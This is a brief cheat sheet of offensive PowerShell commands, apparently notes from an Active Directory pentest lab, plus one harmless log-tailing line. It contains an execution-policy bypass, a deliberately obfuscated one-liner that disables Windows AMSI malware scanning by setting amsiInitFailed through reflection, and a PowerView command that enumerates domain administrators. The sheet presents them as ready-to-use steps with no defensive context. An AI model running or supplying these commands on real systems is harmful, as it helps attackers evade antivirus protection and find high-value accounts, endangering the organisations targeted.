To bypass windows AMSI:

powershell -ep bypass

Bypass AMSI:
PS C:\AD\Tools> sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Get all domain admins:

Get-NetGroup -GroupName "Domain Admins" -FullData

Tail a file and have a keyword hightlighted:

tail -f alerts.json | perl -pe 's/keyword/\e[1;31;43m$&\e[0m/g'
